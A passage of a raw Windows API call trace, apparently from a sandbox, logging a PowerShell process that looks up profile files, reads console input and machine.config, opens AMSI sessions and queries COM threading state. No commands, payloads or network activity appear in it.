lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x37 [0198.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae684) returned 1 [0198.879] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdae700 | out: lpFileInformation=0xdae700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0198.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae680) returned 1 [0198.880] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0198.880] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4c [0198.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae684) returned 1 [0198.880] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdae700 | out: lpFileInformation=0xdae700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0198.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae680) returned 1 [0198.881] QueryPerformanceCounter (in: lpPerformanceCount=0xdae764 | out: lpPerformanceCount=0xdae764*=29391522849) returned 1 [0198.881] GetCurrentProcessId () returned 0x1064 [0198.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x63394e8, Length=0x26030, ResultLength=0xdae6e8 | out: SystemInformation=0x63394e8, ResultLength=0xdae6e8*=0x18d78) returned 0x0 [0199.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0200.005] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0200.058] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0200.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="했ݫ讈ݫユ￿ໟ줜灀꥝恧囊ꀅ⨽똆椉怙폚灃勻뀅楿怙韻灆凬쀅楮怙雬灆僝퀅楝怙闝灆垾楌怙铎灆嚯椻怙鎿灆妉U⪉ᥩ襠椪霄咉逅醙Ɩ首䚑饰唿꤀椈怙ࢩѩՒ隗阁韪灆ᶹU涹ᥩ률業霄僌逅闌Ɩ첖䚕?啺?楋怙䯙ѩ꺗Ց꺐隖阁隮灆㧹Uૹᥩ怒椊꜄喈ꀅ銘ᤙ詠餩灃⢪U碪ѹ誧曇ꩠ楻瀩䪺Uᮺ٩뮦隑꜂嚜ꀅ鎬恦㫊⥩?唉?楙ꘆ閝ʖ躧Ւ躠暗楸瀩俪U᣺٩辦隑꜂⛯ꀅ郿恦࿺⥩議剝謀⩽똆Ꟙʒ?咐騀ゔユ￿࿿⦫٩骶䚒ꭰ剿묀椘똆醋灆溻U㾻٩﮶䚓쭰唎쬀楞똆闬灆ⷛU緛٩?䚗啌椝똆釞灆毻U㳻٩쾶䚓豰唋谀楛옆閸灆⪜U窜٩꧆䚗거啉가椚옆醪灆梼U㦼٩鯆䚓챰唈찀楘옆閌\x16ᘀ颓") returned 0x0 [0200.058] CoTaskMemFree (pv=0x31fd1b0) [0200.061] GetStdHandle (nStdHandle=0xfffffff6) returned 0x198 [0200.062] GetFileType (hFile=0x198) returned 0x3 [0200.062] GetConsoleCP () returned 0x1b5 [0200.103] ReadFile (in: hFile=0x198, lpBuffer=0x576dbd0, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0xdae6fc, lpOverlapped=0x0 | out: lpBuffer=0x576dbd0*, lpNumberOfBytesRead=0xdae6fc*=0x75, lpOverlapped=0x0) returned 1 [0200.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0200.147] AmsiCloseSession () returned 0x33777e8 [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7cc [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7d4 [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x814 [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x818 [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x81c [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x820 [0200.148] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x824 [0200.149] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x828 [0200.149] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x82c [0200.149] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x830 [0200.149] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x834 [0200.149] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x838 [0200.154] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x83c [0200.154] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x840 [0200.154] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae694 | out: phkResult=0xdae694*=0x844) returned 0x0 [0200.158] RegQueryValueExW (in: hKey=0x844, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xdae6b4, lpData=0x0, lpcbData=0xdae6b0*=0x0 | out: lpType=0xdae6b4*=0x0, lpData=0x0, lpcbData=0xdae6b0*=0x0) returned 0x2 [0200.159] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x848 [0200.159] SetEvent (hEvent=0x848) returned 1 [0200.289] SetEvent (hEvent=0x818) returned 1 [0200.289] SetEvent (hEvent=0x7cc) returned 1 [0200.289] SetEvent (hEvent=0x7d4) returned 1 [0200.289] SetEvent (hEvent=0x814) returned 1 [0227.270] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0227.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0227.290] ReadFile (in: hFile=0x198, lpBuffer=0x54fbf94, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0xdae6fc, lpOverlapped=0x0 | out: lpBuffer=0x54fbf94*, lpNumberOfBytesRead=0xdae6fc*=0x6, lpOverlapped=0x0) returned 1 [0227.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae77c | out: lpConsoleScreenBufferInfo=0xdae77c) returned 1 [0227.293] AmsiCloseSession () returned 0x33777e8 [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x804 [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7fc [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f8 [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f4 [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f0 [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7ec [0227.293] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x808 [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x80c [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8cc [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8b4 [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a8 [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8b8 [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8bc [0227.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8dc [0227.295] SetEvent (hEvent=0x848) returned 1 [0227.297] SetEvent (hEvent=0x7f4) returned 1 [0227.297] SetEvent (hEvent=0x804) returned 1 [0227.297] SetEvent (hEvent=0x7fc) returned 1 [0227.297] SetEvent (hEvent=0x7f8) returned 1 [0228.209] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdada04, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0228.210] CoTaskMemAlloc (cb=0x20c) returned 0x7678f60 [0228.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7678f60, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0228.211] CoTaskMemFree (pv=0x7678f60) [0228.211] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0228.211] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0228.231] GetCurrentProcess () returned 0xffffffff [0228.231] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadd6c | out: TokenHandle=0xdadd6c*=0x8d0) returned 1 [0228.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0228.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0228.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xdadd64 | out: lpFileInformation=0xdadd64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0228.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0228.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0228.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xdadd6c | out: lpFileInformation=0xdadd6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0228.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0228.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0228.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdadca4) returned 1 [0228.240] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8e8 [0228.241] GetFileType (hFile=0x8e8) returned 0x1 [0228.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdadca0) returned 1 [0228.241] GetFileType (hFile=0x8e8) returned 0x1 [0228.957] GetFileSize (in: hFile=0x8e8, lpFileSizeHigh=0xdadd60 | out: lpFileSizeHigh=0xdadd60*=0x0) returned 0x8c8f [0228.957] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdadd1c, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdadd1c*=0x1000, lpOverlapped=0x0) returned 1 [0229.819] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdadbc8, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdadbc8*=0x1000, lpOverlapped=0x0) returned 1 [0229.822] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdada7c, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdada7c*=0x1000, lpOverlapped=0x0) returned 1 [0229.822] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdada7c, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdada7c*=0x1000, lpOverlapped=0x0) returned 1 [0229.823] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdada7c, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdada7c*=0x1000, lpOverlapped=0x0) returned 1 [0229.823] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdad9b4, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdad9b4*=0x1000, lpOverlapped=0x0) returned 1 [0229.858] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdadb38, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdadb38*=0x1000, lpOverlapped=0x0) returned 1 [0229.860] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdada44, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdada44*=0x1000, lpOverlapped=0x0) returned 1 [0229.860] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdada44, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdada44*=0xc8f, lpOverlapped=0x0) returned 1 [0229.860] ReadFile (in: hFile=0x8e8, lpBuffer=0x570aa9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdadb08, lpOverlapped=0x0 | out: lpBuffer=0x570aa9c*, lpNumberOfBytesRead=0xdadb08*=0x0, lpOverlapped=0x0) returned 1 [0229.864] CloseHandle (hObject=0x8e8) returned 1 [0229.867] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdada00, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0229.867] CoTaskMemAlloc (cb=0x20c) returned 0x7678f60 [0229.867] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7678f60, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0229.868] CoTaskMemFree (pv=0x7678f60) [0229.868] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0229.868] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0229.868] GetCurrentProcess () returned 0xffffffff [0229.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadeb4 | out: TokenHandle=0xdadeb4*=0x8e8) returned 1 [0229.871] GetCurrentProcess () returned 0xffffffff [0229.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadeb4 | out: TokenHandle=0xdadeb4*=0x8d4) returned 1 [0229.874] GetCurrentProcess () returned 0xffffffff [0229.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadd6c | out: TokenHandle=0xdadd6c*=0x8d8) returned 1 [0229.875] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xdadd64 | out: lpFileInformation=0xdadd64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.875] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0229.875] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x41, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0229.876] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xdadd6c | out: lpFileInformation=0xdadd6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.877] GetCurrentProcess () returned 0xffffffff [0229.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadeb4 | out: TokenHandle=0xdadeb4*=0x8ec) returned 1 [0229.878] GetCurrentProcess () returned 0xffffffff [0229.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadeb4 | out: TokenHandle=0xdadeb4*=0x8c4) returned 1 [0230.154] GetCurrentProcess () returned 0xffffffff [0230.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadd14 | out: TokenHandle=0xdadd14*=0x8c8) returned 1 [0230.227] GetCurrentProcess () returned 0xffffffff [0230.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdadd24 | out: TokenHandle=0xdadd24*=0x8e0) returned 1 [0230.235] CoCreateGuid (in: pguid=0xdae0d0 | out: pguid=0xdae0d0*(Data1=0xa2763750, Data2=0x26c3, Data3=0x4b6e, Data4=([0]=0x80, [1]=0x1b, [2]=0x27, [3]=0x2f, [4]=0xf9, [5]=0xe6, [6]=0xfa, [7]=0x8d))) returned 0x0 [0230.243] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x57284d0*="Stopped", lpRawData=0x57283f8) returned 1 [0230.245] AmsiCloseSession () returned 0x33777e8 [0230.245] AmsiUninitialize () returned 0x1 [0230.494] SetEvent (hEvent=0x848) returned 1 [0230.660] CloseHandle (hObject=0x848) returned 1 [0231.771] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0231.774] CoGetContextToken (in: pToken=0xdaf7d0 | out: pToken=0xdaf7d0) returned 0x0 [0231.774] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf7f4 | out: ppvObject=0xdaf7f4*=0x320a794) returned 0x0 [0231.774] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf854 | out: pThreadType=0xdaf854*=0) returned 0x0 [0231.774] IUnknown:Release (This=0x320a794) returned 0x0 [0231.775] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0231.775] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0231.775] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0231.775] IUnknown:Release (This=0x320a794) returned 0x0 [0231.779] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0231.779] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0231.779] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0231.779] IUnknown:Release (This=0x320a794) returned 0x0 [0231.790] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0231.790] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0231.790] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0231.790] IUnknown:Release (This=0x320a794) returned 0x0 [0232.030] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0232.030] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0232.030] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0232.030] IUnknown:Release (This=0x320a794) returned 0x0 [0232.227] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0232.227] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xdaf4f8 | out: ppvObject=0xdaf4f8*=0x320a794) returned 0x0 [0232.227] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0xdaf524 | out: pThreadType=0xdaf524*=0) returned 0x0 [0232.227] IUnknown:Release (This=0x320a794) returned 0x0 [0232.478] CoGetContextToken (in: pToken=0xdaf4d4 | out: pToken=0xdaf4d4) returned 0x0 [0232.478] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, 